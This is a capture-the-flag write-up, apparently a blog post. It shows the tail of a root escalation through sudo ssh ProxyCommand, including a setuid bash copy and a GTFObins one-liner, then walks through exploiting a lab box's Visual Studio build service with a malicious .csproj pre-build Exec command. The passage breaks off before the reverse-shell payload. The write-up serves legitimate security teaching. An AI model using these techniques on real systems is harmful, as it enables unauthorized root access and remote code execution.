josh@cozyhosting:~$ sudo ssh -o ProxyCommand='cp /bin/bash /tmp/0xdf' localhost
kex_exchange_identification: Connection closed by remote host
Connection closed by UNKNOWN port 65535
josh@cozyhosting:~$ sudo ssh -o ProxyCommand='chmod 6777 /tmp/0xdf' localhost
kex_exchange_identification: Connection closed by remote host
Connection closed by UNKNOWN port 65535
josh@cozyhosting:~$ ls -l /tmp/0xdf
-rwsrwsrwx 1 root root 1396520 Feb 27 18:20 /tmp/0xdf
Now running it (with -p
to not drop privs) gives a root shell:
josh@cozyhosting:~$ /tmp/0xdf -p
0xdf-5.1# id
uid=1003(josh) gid=1003(josh) euid=0(root) egid=0(root) groups=0(root),1003(josh)
GTFObins gives a shorter path, using redirection to get the shell immediately from the ssh
process:
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)
Either way, I can grab the flag:
0xdf-5.1# cat /root/root.txt
01ebd55a************************
Visual is all about abusing a Visual Studio build process. There’s a website that takes a hosted Git URL and loads a Visual Studio project from the URL and compiles it. I’ll stand up a Gitea server in a container and host a project with a pre-build action that runs a command and gets a shell. From there, I’ll drop a webshell into the XAMPP web root to get a shell as local service. This service is running without SeImpersonate privileges, but I’ll use the FullPower executable to recover this, and then GodPotato to get System.
Name | Visual Play on HackTheBox |
---|---|
Release Date | 30 Sep 2023 |
Retire Date | 24 Feb 2024 |
OS | Windows |
Base Points | Medium [30] |
Rated Difficulty | |
Radar Graph | |
00:18:48 | |
00:41:19 | |
Creator |
nmap
finds one open TCP port, HTTP (80):
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.234
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-20 14:56 EST
Nmap scan report for 10.10.11.234
Host is up (0.092s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 13.63 seconds
oxdf@hacky$ nmap -p 80 -sCV 10.10.11.234
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-20 14:56 EST
Nmap scan report for 10.10.11.234
Host is up (0.091s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
|_http-title: Visual - Revolutionizing Visual Studio Builds
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds
Based on the Apache version, this his a Windows host, running a PHP webserver.
The site offers a service that compiles Visual Studio projects:
At the bottom, there’s text field to “Submit Your Repo”:
I know that HTB labs can’t access the internet, but giving it https://github.com/0xdf/test
returns a message that says it’s trying:
This page is at /uploads/bc52b27d25b2eb4fa36827c369fe26/
, and refreshes itself every few seconds, until it shows:
.sln
is the extension for a Visual Studio project file, so that fits the theme.
The site is a PHP site. Submissions go to /submit.php
. The main site loads as http://10.10.11.234/index.php
. Adding index.php
to the end of the uploads
path also loads.
The HTTP response headers don’t give much else of interest:
HTTP/1.1 200 OK
Date: Tue, 20 Feb 2024 20:04:00 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Content-Length: 7534
Connection: close
Content-Type: text/html; charset=UTF-8
The 404 page is the default Apache page:
I’ll run feroxbuster
against the site, and include -x php
since I know the site is PHP:
oxdf@hacky$ feroxbuster -u http://10.10.11.234 -x php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.11.234
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 30w 302c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 33w 299c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 117l 555w 7534c http://10.10.11.234/
301 GET 9l 30w 335c http://10.10.11.234/css => http://10.10.11.234/css/
301 GET 9l 30w 334c http://10.10.11.234/js => http://10.10.11.234/js/
301 GET 9l 30w 339c http://10.10.11.234/uploads => http://10.10.11.234/uploads/
301 GET 9l 30w 338c http://10.10.11.234/assets => http://10.10.11.234/assets/
403 GET 11l 47w 421c http://10.10.11.234/webalizer
200 GET 117l 555w 7534c http://10.10.11.234/index.php
403 GET 11l 47w 421c http://10.10.11.234/phpmyadmin
301 GET 9l 30w 335c http://10.10.11.234/CSS => http://10.10.11.234/CSS/
301 GET 9l 30w 334c http://10.10.11.234/JS => http://10.10.11.234/JS/
301 GET 9l 30w 339c http://10.10.11.234/Uploads => http://10.10.11.234/Uploads/
301 GET 9l 30w 338c http://10.10.11.234/Assets => http://10.10.11.234/Assets/
503 GET 11l 44w 402c http://10.10.11.234/examples
200 GET 0l 0w 0c http://10.10.11.234/submit.php
301 GET 9l 30w 334c http://10.10.11.234/Js => http://10.10.11.234/Js/
301 GET 9l 30w 335c http://10.10.11.234/Css => http://10.10.11.234/Css/
403 GET 11l 47w 421c http://10.10.11.234/licenses
403 GET 11l 47w 421c http://10.10.11.234/server-status
200 GET 117l 555w 7534c http://10.10.11.234/Index.php
301 GET 9l 30w 339c http://10.10.11.234/UPLOADS => http://10.10.11.234/UPLOADS/
200 GET 0l 0w 0c http://10.10.11.234/Submit.php
403 GET 11l 47w 421c http://10.10.11.234/server-info
[####################] - 3m 360000/360000 0s found:22 errors:675
[####################] - 2m 30000/30000 169/s http://10.10.11.234/
[####################] - 0s 30000/30000 0/s http://10.10.11.234/css/ => Directory listing (remove --dont-extract-links to scan)
[####################] - 0s 30000/30000 0/s http://10.10.11.234/js/ => Directory listing (remove --dont-extract-links to scan)
[####################] - 2m 30000/30000 167/s http://10.10.11.234/uploads/
[####################] - 0s 30000/30000 0/s http://10.10.11.234/assets/ => Directory listing (remove --dont-extract-links to scan)
[####################] - 0s 30000/30000 0/s http://10.10.11.234/CSS/ => Directory listing (remove --dont-extract-links to scan)
[####################] - 0s 30000/30000 0/s http://10.10.11.234/JS/ => Directory listing (remove --dont-extract-links to scan)
[####################] - 2m 30000/30000 169/s http://10.10.11.234/Uploads/
[####################] - 0s 30000/30000 0/s http://10.10.11.234/Assets/ => Directory listing (remove --dont-extract-links to scan)
[####################] - 0s 30000/30000 0/s http://10.10.11.234/Js/ => Directory listing (remove --dont-extract-links to scan)
[####################] - 0s 30000/30000 0/s http://10.10.11.234/Css/ => Directory listing (remove --dont-extract-links to scan)
[####################] - 2m 30000/30000 187/s http://10.10.11.234/UPLOADS/
It makes sense that the directories don’t seem to be case sensitive (standard for Windows). There are some 403s for webalizer
, phpmyadmin
, and examples
. Might be the default XAMPP configuration.
It seems clear that I need to get the site to upload some kind of malicious Visual Studio project. The first step is to get it to connect to something I control.
I’ll start a Python webserver on my VM and give the site a URL using my HTB VPN IP:
It takes a minute after I submit, but eventually there’s a request:
oxdf@hacky$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.234 - - [20/Feb/2024 15:37:42] code 404, message File not found
10.10.11.234 - - [20/Feb/2024 15:37:42] "GET /test/info/refs?service=git-upload-pack HTTP/1.1" 404 -
To get a better look at that, I’ll kill the webserver and listen on 80 with nc
, and send the same URL:
oxdf@hacky$ nc -lnvp 80
Listening on 0.0.0.0 80
Connection received on 10.10.11.234 49677
GET /test/info/refs?service=git-upload-pack HTTP/1.1
Host: 10.10.14.6
User-Agent: git/2.41.0.windows.1
Accept: */*
Accept-Encoding: deflate, gzip, br, zstd
Pragma: no-cache
Git-Protocol: version=2
It’s using git
to try to get a repository from my server over HTTP.
I need to host a Git server. Gitea seems like as good as any option. I’ll use Docker to get an instance up and running. First, I’ll pull the image:
oxdf@hacky$ docker pull gitea/gitea:latest
latest: Pulling from gitea/gitea
619be1103602: Pull complete
172dd90f8cd3: Pull complete
e351dffe3e2e: Pull complete
23115583656f: Pull complete
29191722a758: Pull complete
365242e44775: Pull complete
2b8d3024c169: Pull complete
Digest: sha256:a2095ce71c414c0c6a79192f3933e668a595f7fa7706324edd0aa25c8728f00f
Status: Downloaded newer image for gitea/gitea:latest
docker.io/gitea/gitea:latest
Now I’ll run the server, telling Docker to forward port 3000 through to me:
oxdf@hacky$ docker run -p 3000:3000 gitea/gitea
Generating /data/ssh/ssh_host_ed25519_key...
Generating /data/ssh/ssh_host_rsa_key...
2024/02/20 21:00:30 cmd/web.go:242:runWeb() [I] Starting Gitea on PID: 18
2024/02/20 21:00:30 cmd/web.go:111:showWebStartupMessage() [I] Gitea version: 1.21.5 built with GNU Make 4.4.1, go1.21.6 : bindata, timetzdata, sqlite, sqlite_unlock_notify
2024/02/20 21:00:30 cmd/web.go:112:showWebStartupMessage() [I] * RunMode: prod
2024/02/20 21:00:30 cmd/web.go:113:showWebStartupMessage() [I] * AppPath: /usr/local/bin/gitea
2024/02/20 21:00:30 cmd/web.go:114:showWebStartupMessage() [I] * WorkPath: /data/gitea
2024/02/20 21:00:30 cmd/web.go:115:showWebStartupMessage() [I] * CustomPath: /data/gitea
2024/02/20 21:00:30 cmd/web.go:116:showWebStartupMessage() [I] * ConfigFile: /data/gitea/conf/app.ini
2024/02/20 21:00:30 cmd/web.go:117:showWebStartupMessage() [I] Prepare to run install page
Generating /data/ssh/ssh_host_ecdsa_key...
Server listening on :: port 22.
Server listening on 0.0.0.0 port 22.
2024/02/20 21:00:31 cmd/web.go:304:listen() [I] Listen: http://0.0.0.0:3000
2024/02/20 21:00:31 cmd/web.go:308:listen() [I] AppURL(ROOT_URL): http://localhost:3000/
2024/02/20 21:00:31 ...s/graceful/server.go:70:NewServer() [I] Starting new Web server: tcp:0.0.0.0:3000 on PID: 18
Visiting http://127.0.0.1:3000
offers the Gitea setup:
It’s important to create an account at the bottom under “Administrator Account Settings”:
On clicking “Install Gitea”, it refreshes (and may crash, but on refreshing again) I’ve got a Gitea instance.
Before I try to exploit this, I want to understand how the application works. I’m going to make a Hello World dummy application and upload it to Visual. I’ll show both how to do this in Windows and on Linux.
flowchart TD;
A["Create in\nVisual Studio\non Windows"]-->B(Run on Visual);
C["Create with\ndotnet\non Linux"]-->B;
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
I’ll create my own Visual Studio project by opening Visual Studio and creating a new project, select C# Console App, and give it the name Hello0xdf:
On the next screen I’ll make sure to pick .NET 6.0 (as that’s what the site on Visual said they support):
In the project that opens, there’s a Program.cs
that has a simple print:
This creates a Hello0xdf
folder that has a Hello0xdf.sln
file in it:
The Hello0xdf
folder in that has the source files, as well as the Hello0xdf.csproj
file, which is also important:
If I “Build” -> “Build Solution”, it shows it generates a .dll
executable:
Build started at 10:40 AM...
1>------ Build started: Project: Hello0xdf, Configuration: Debug Any CPU ------
1>Hello0xdf -> Z:\hackthebox\visual-10.10.11.234\projects\Hello0xdf\Hello0xdf\bin\Debug\net6.0\Hello0xdf.dll
========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ==========
========== Build completed at 10:40 AM and took 00.724 seconds ==========
There’s actually a bunch of files, including a .exe
:
PS > ls
Directory: Z:\hackthebox\visual-10.10.11.234\projects\Hello0xdf\Hello0xdf\bin\Debug\net6.0
Mode LastWriteTime Length Name
---- ------------- ------ ----
------ 2/21/2024 10:41 AM 149504 Hello0xdf.exe
------ 2/21/2024 10:41 AM 10244 Hello0xdf.pdb
------ 2/21/2024 10:40 AM 419 Hello0xdf.deps.json
------ 2/21/2024 10:40 AM 147 Hello0xdf.runtimeconfig.json
------ 2/21/2024 10:41 AM 4608 Hello0xdf.dll
PS > .\Hello0xdf.exe
Hello, 0xdf!
I’ll copy these files back to my Linux host where I’ve got Gitea, and I’ll create a new repo:
I’ll name it “Hello0xdf”, and follow the instructions for creating a new repo around my project:
oxdf@hacky$ git init
Initialized empty Git repository in /media/sf_CTFs/hackthebox/visual-10.10.11.234/projects/Hello0xdf/.git/
oxdf@hacky$ git checkout -b main
Switched to a new branch 'main'
oxdf@hacky$ git add .
oxdf@hacky$ git commit -m "hello 0xdf!"
[main (root-commit) affd06e] hello 0xdf!
30 files changed, 290 insertions(+)
create mode 100644 .vs/Hello0xdf/DesignTimeBuild/.dtbcache.v2
create mode 100644 .vs/Hello0xdf/FileContentIndex/8ce28047-0dfe-46b6-a3af-27764eadc730.vsidx
create mode 100644 .vs/Hello0xdf/v17/.suo
create mode 100644 Hello0xdf.sln
create mode 100644 Hello0xdf/Hello0xdf.csproj
create mode 100644 Hello0xdf/Program.cs
...[snip]...
oxdf@hacky$ git remote add origin http://10.10.14.6:3000/0xdf/Hello0xdf.git
oxdf@hacky$ git push -u origin main
Username for 'http://10.10.14.6:3000': 0xdf
Password for 'http://0xdf@10.10.14.6:3000':
Enumerating objects: 41, done.
Counting objects: 100% (41/41), done.
Delta compression using up to 8 threads
Compressing objects: 100% (34/34), done.
Writing objects: 100% (41/41), 95.20 KiB | 5.60 MiB/s, done.
Total 41 (delta 2), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.10.14.6:3000/0xdf/Hello0xdf.git
* [new branch] main -> main
Branch 'main' set up to track remote branch 'main' from 'origin'.
Now it shows up in Gitea:
If I don’t want to go over to a Windows VM, I can make a project in Linux with dotnet
. .Net version can be a real pain, so it’s easiest to just use a Docker container specifically for .NET 6 as the website says it supports (like I did in Keeper). I’ll make a directory for this project, and share it into the container:
oxdf@hacky$ mkdir HelloLinux
oxdf@hacky$ docker run --rm -it -v HelloLinux:/HelloLiunx mcr.microsoft.com/dotnet/sdk:6.0 bash
Unable to find image 'mcr.microsoft.com/dotnet/sdk:6.0' locally
6.0: Pulling from dotnet/sdk
5d0aeceef7ee: Pull complete
7c2bfda75264: Pull complete
950196e58fe3: Pull complete
ecf3c05ee2f6: Pull complete
819f3b5e3ba4: Pull complete
19984358397d: Pull complete
d99f9f96f040: Pull complete
d6d23fc1b8fc: Pull complete
Digest: sha256:fdac9ba57a38ffaa6494b93de33983644c44d9e491e4e312f35ddf926c55a073
Status: Downloaded newer image for mcr.microsoft.com/dotnet/sdk:6.0
root@ef5f5f0ac789:/#
I am mounting the project directory into the container from my host so that I can use the container to make the project, but then my host to interact with Gitea and not have to worry about networking.
I’ll create a project:
root@ef5f5f0ac789:/HelloLiunx# dotnet new console
The template "Console App" was created successfully.
Processing post-creation actions...
Running 'dotnet restore' on /HelloLiunx/HelloLiunx.csproj...
Determining projects to restore...
Restored /HelloLiunx/HelloLiunx.csproj (in 64 ms).
Restore succeeded.
This creates a project with a Hello World program:
root@ef5f5f0ac789:/HelloLiunx# ls
HelloLiunx.csproj Program.cs obj
root@ef5f5f0ac789:/HelloLiunx# cat Program.cs
// See https://aka.ms/new-console-template for more information
Console.WriteLine("Hello, World!");
Now I need a Visual Studio solution file (.sln
):
root@ef5f5f0ac789:/HelloLiunx# dotnet new sln
The template "Solution File" was created successfully.
root@ef5f5f0ac789:/HelloLiunx# ls
HelloLiunx.csproj HelloLiunx.sln Program.cs obj
This creates the .sln
file, but doesn’t associate it at all with the .csproj
:
root@ef5f5f0ac789:/HelloLiunx# cat HelloLiunx.sln
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.0.31903.59
MinimumVisualStudioVersion = 10.0.40219.1
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
I need to tie these together:
root@ef5f5f0ac789:/HelloLiunx# dotnet sln HelloLiunx.sln add HelloLiunx.csproj
Project `HelloLiunx.csproj` added to the solution.
root@ef5f5f0ac789:/HelloLiunx# cat HelloLiunx.sln
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.0.31903.59
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "HelloLiunx", "HelloLiunx.csproj", "{8851DCFA-2958-4CFF-ACA9-37734A7220F2}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{8851DCFA-2958-4CFF-ACA9-37734A7220F2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{8851DCFA-2958-4CFF-ACA9-37734A7220F2}.Debug|Any CPU.Build.0 = Debug|Any CPU
{8851DCFA-2958-4CFF-ACA9-37734A7220F2}.Release|Any CPU.ActiveCfg = Release|Any CPU
{8851DCFA-2958-4CFF-ACA9-37734A7220F2}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
EndGlobal
Now the .sln
has a reference to the .csproj
.
This builds and runs:
root@ef5f5f0ac789:/HelloLiunx# dotnet build
MSBuild version 17.3.2+561848881 for .NET
Determining projects to restore...
All projects are up-to-date for restore.
HelloLiunx -> /HelloLiunx/bin/Debug/net6.0/HelloLiunx.dll
Build succeeded.
0 Warning(s)
0 Error(s)
Time Elapsed 00:00:01.69
root@ef5f5f0ac789:/HelloLiunx# dotnet run
Hello, World!
root@ef5f5f0ac789:/HelloLiunx# ls bin/Debug/net6.0/
HelloLiunx HelloLiunx.deps.json HelloLiunx.dll HelloLiunx.pdb HelloLiunx.runtimeconfig.json
I’ll push that to Gitea the same way as the previous, creating a new repo, and then adding the remote (now back in my VM, out of the container):
oxdf@hacky$ git init
Initialized empty Git repository in /media/sf_CTFs/hackthebox/visual-10.10.11.234/projects/HelloLinux/.git/
oxdf@hacky$ git add .
oxdf@hacky$ git commit -m "hello world from linux"
[main (root-commit) b724c06] hello world from linux
27 files changed, 285 insertions(+)
create mode 100644 HelloLinux.csproj
create mode 100644 HelloLinux.sln
create mode 100644 Program.cs
create mode 100644 bin/Debug/net8.0/HelloLinux
create mode 100644 bin/Debug/net8.0/HelloLinux.deps.json
create mode 100644 bin/Debug/net8.0/HelloLinux.dll
create mode 100644 bin/Debug/net8.0/HelloLinux.pdb
create mode 100644 bin/Debug/net8.0/HelloLinux.runtimeconfig.json
create mode 100644 obj/Debug/net8.0/.NETCoreApp,Version=v8.0.AssemblyAttributes.cs
create mode 100644 obj/Debug/net8.0/HelloLinux.AssemblyInfo.cs
create mode 100644 obj/Debug/net8.0/HelloLinux.AssemblyInfoInputs.cache
create mode 100644 obj/Debug/net8.0/HelloLinux.GeneratedMSBuildEditorConfig.editorconfig
create mode 100644 obj/Debug/net8.0/HelloLinux.GlobalUsings.g.cs
create mode 100644 obj/Debug/net8.0/HelloLinux.assets.cache
create mode 100644 obj/Debug/net8.0/HelloLinux.csproj.CoreCompileInputs.cache
create mode 100644 obj/Debug/net8.0/HelloLinux.csproj.FileListAbsolute.txt
create mode 100644 obj/Debug/net8.0/HelloLinux.dll
create mode 100644 obj/Debug/net8.0/HelloLinux.genruntimeconfig.cache
create mode 100644 obj/Debug/net8.0/HelloLinux.pdb
create mode 100644 obj/Debug/net8.0/apphost
create mode 100644 obj/Debug/net8.0/ref/HelloLinux.dll
create mode 100644 obj/Debug/net8.0/refint/HelloLinux.dll
create mode 100644 obj/HelloLinux.csproj.nuget.dgspec.json
create mode 100644 obj/HelloLinux.csproj.nuget.g.props
create mode 100644 obj/HelloLinux.csproj.nuget.g.targets
create mode 100644 obj/project.assets.json
create mode 100644 obj/project.nuget.cache
oxdf@hacky$ git remote add origin http://10.10.14.6:3000/0xdf/HelloLinux.git
oxdf@hacky$ git push -u origin main
Username for 'http://10.10.14.6:3000': 0xdf
Password for 'http://0xdf@10.10.14.6:3000':
Enumerating objects: 32, done.
Counting objects: 100% (32/32), done.
Delta compression using up to 8 threads
Compressing objects: 100% (28/28), done.
Writing objects: 100% (32/32), 43.57 KiB | 5.45 MiB/s, done.
Total 32 (delta 2), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.10.14.6:3000/0xdf/HelloLinux.git
* [new branch] main -> main
Branch 'main' set up to track remote branch 'main' from 'origin'.
I’ll submit both of these to Visual via the web form. The result for my project returns the same files I got when building above:
If I have the .exe
, the .dll
, and the .runtimeconfig.json
file in the same directory, they run:
PS Z:\hackthebox\visual-10.10.11.234 > .\Hello0xdf.exe
Hello, 0xdf!
The Linux build is similar (as long as I have the .NET version correct):
It is possible to configure a project to run “pre-build” and “post-build” event commands. This article from HowToGeek goes into it. My idea here is to use a pre-build command to get execution when I submit it to the site and it builds the project. I’ll show three ways to do this:
flowchart TD;
C[Add in VS]-->B;
A[Modify .csproj]-->B(RCE);
D[RCE Project\nfrom Github]-->B;
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
In Visual Studio, I’ll go to “Project” -> “Hello0xdf Properties” to get the properties dialog, and under “Build” -> “Events” there’s a “Pre-build event” section. I’ll add a ping
:
If I try to build the project now, I’ll see it’s trying to ping my VPN IP (which the Windows VM isn’t aware of):
Looking at git, there are a few updated files, but it’s the .csproj
file that’s interesting:
oxdf@hacky$ git status
On branch main
Your branch is up to date with 'origin/main'.
Changes not staged for commit:
(use "git add <file>..." to update what will be committed)
(use "git restore <file>..." to discard changes in working directory)
modified: .vs/Hello0xdf/DesignTimeBuild/.dtbcache.v2
modified: .vs/Hello0xdf/v17/.suo
modified: Hello0xdf/Hello0xdf.csproj
Untracked files:
(use "git add <file>..." to include in what will be committed)
.vs/Hello0xdf/v17/.futdcache.v2
.vs/ProjectEvaluation/
no changes added to commit (use "git add" and/or "git commit -a")
I’ll push that to Gitea:
oxdf@hacky$ git add .
oxdf@hacky$ git commit -m "added pre-build ping"
[main adb2d18] added pre-build ping
6 files changed, 4 insertions(+)
create mode 100644 .vs/Hello0xdf/v17/.futdcache.v2
rewrite .vs/Hello0xdf/v17/.suo (67%)
create mode 100644 .vs/ProjectEvaluation/hello0xdf.metadata.v7.bin
create mode 100644 .vs/ProjectEvaluation/hello0xdf.projects.v7.bin
oxdf@hacky$ git push
Username for 'http://10.10.14.6:3000': 0xdf
Password for 'http://0xdf@10.10.14.6:3000':
Enumerating objects: 23, done.
Counting objects: 100% (23/23), done.
Delta compression using up to 8 threads
Compressing objects: 100% (13/13), done.
Writing objects: 100% (14/14), 55.60 KiB | 5.56 MiB/s, done.
Total 14 (delta 4), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.10.14.6:3000/0xdf/Hello0xdf.git
affd06e..adb2d18 main -> main
I’ll submit this repo to Visual, and have tcpdump
listening for ICMP. After a couple minutes, I get pinged:
oxdf@hacky$ sudo tcpdump -ni tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
11:28:02.138137 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 5, length 40
11:28:02.138179 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 5, length 40
11:28:03.144755 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 6, length 40
11:28:03.144784 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 6, length 40
11:28:04.160208 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 7, length 40
11:28:04.160229 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 7, length 40
11:28:05.175882 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 8, length 40
11:28:05.175901 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 8, length 40
And then it reports success:
The file that changed was the .csproj
file, so I can just update that in my HelloLinux
project. It starts as:
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net6.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
</PropertyGroup>
</Project>
I’ll add a “PreBuild” target:
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net6.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
</PropertyGroup>
<Target Name="PreBuild" BeforeTargets="PreBuildEvent">
<Exec Command="ping 10.10.14.6" />
</Target>
</Project>
If I dotnet build
this in the container:
root@cdb07b3737f8:/HelloLiunx# dotnet build
MSBuild version 17.3.2+561848881 for .NET
Determining projects to restore...
All projects are up-to-date for restore.
/bin/sh: 2: /tmp/MSBuildTemproot/tmp975b311408f24122bd271e2d6258d014.exec.cmd: ping: not found
/HelloLiunx/HelloLiunx.csproj(10,5): error MSB3073: The command "ping 10.10.14.6" exited with code 127.
Build FAILED.
/HelloLiunx/HelloLiunx.csproj(10,5): error MSB3073: The command "ping 10.10.14.6" exited with code 127.
0 Warning(s)
1 Error(s)
Time Elapsed 00:00:00.64
It fails because ping
is not found. That’s ok, it’s trying to run the command!
I’ll update Git and push to Gitea:
oxdf@hacky$ git add HelloLiunx.csproj
oxdf@hacky$ git commit -m "added ping prebuild"
[main 19a7a39] added ping prebuild
1 file changed, 3 insertions(+)
oxdf@hacky$ git push
Username for 'http://10.10.14.6:3000': 0xdf
Password for 'http://0xdf@10.10.14.6:3000':
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 8 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 385 bytes | 385.00 KiB/s, done.
Total 3 (delta 2), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.10.14.6:3000/0xdf/HelloLinux.git
b74c17c..19a7a39 main -> main
Now when I resubmit the URL for this repo, I get ICMP packets at my host from Visual:
oxdf@hacky$ sudo tcpdump -ni tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
13:59:00.653574 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 13, length 40
13:59:00.653601 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 13, length 40
13:59:01.658623 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 14, length 40
13:59:01.658638 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 14, length 40
13:59:02.673184 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 15, length 40
13:59:02.673211 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 15, length 40
13:59:03.689172 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 16, length 40
13:59:03.689197 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 16, length 40
And then it shows success:
It turns out that the author of this box also has a repo on Github called vs-rce that’s been up since before Visual’s release. It’s a simple VS project:
In rce
, the Program.cs
is the default Hello World. The rce.csproj
has the trigger (done slightly more simply than I showed):
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net6.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
<PreBuildEvent>calc.exe</PreBuildEvent>
</PropertyGroup>
</Project>
In my Gitea instance, I’ll select “New Migration”:
I’ll select GitHub, and on the next page git it the URL for this repo. It copies the repo into Gitea:
I’ll edit the rce.csproj
file to replace calc.exe
with ping 10.10.14.6
:
I’ll save and commit that, and then submit the URL for this repo to Visual. After a minute or so, there’s ICMP packets:
oxdf@hacky$ sudo tcpdump -ni tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
14:04:52.304056 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 17, length 40
14:04:52.304089 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 17, length 40
14:04:53.312126 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 18, length 40
14:04:53.312151 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 18, length 40
14:04:54.326953 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 19, length 40
14:04:54.326978 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 19, length 40
14:04:55.342651 IP 10.10.11.234 > 10.10.14.6: ICMP echo request, id 1, seq 20, length 40
14:04:55.342669 IP 10.10.14.6 > 10.10.11.234: ICMP echo reply, id 1, seq 20, length 40
To get a shell, I’ll update the HelloLinux.csproj
file, replacing the ping
with a PowerShell one-liner (PowerShell #3 (Base64) from https://www.revshells.com/):
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<OutputType>Exe</OutputType>
<TargetFramework>net6.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
</PropertyGroup>
<Target Name="PreBuild" BeforeTargets="PreBuildEvent">
